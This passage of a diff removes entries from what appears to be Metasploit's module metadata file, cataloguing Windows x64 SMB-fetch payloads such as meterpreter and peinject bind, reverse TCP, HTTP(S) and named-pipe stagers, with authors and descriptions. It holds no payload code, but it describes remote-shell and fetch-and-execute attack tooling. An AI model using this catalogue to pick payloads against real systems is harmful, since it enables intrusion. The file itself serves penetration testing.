"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_rc4": { - "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_uuid": { - "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_http": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_https": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_named_pipe": { - "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4": { - "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid": { - "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttp": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttps": { - "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/smb/x64/meterpreter_bind_named_pipe": { - "name": "SMB Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_bind_tcp": { - "name": "SMB Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_http": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_https": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_tcp": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/peinject/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/peinject/bind_tcp": { - "name": "SMB Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/peinject/bind_tcp_rc4": { - "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/peinject/bind_tcp_uuid": { - "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_named_pipe": { - "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - 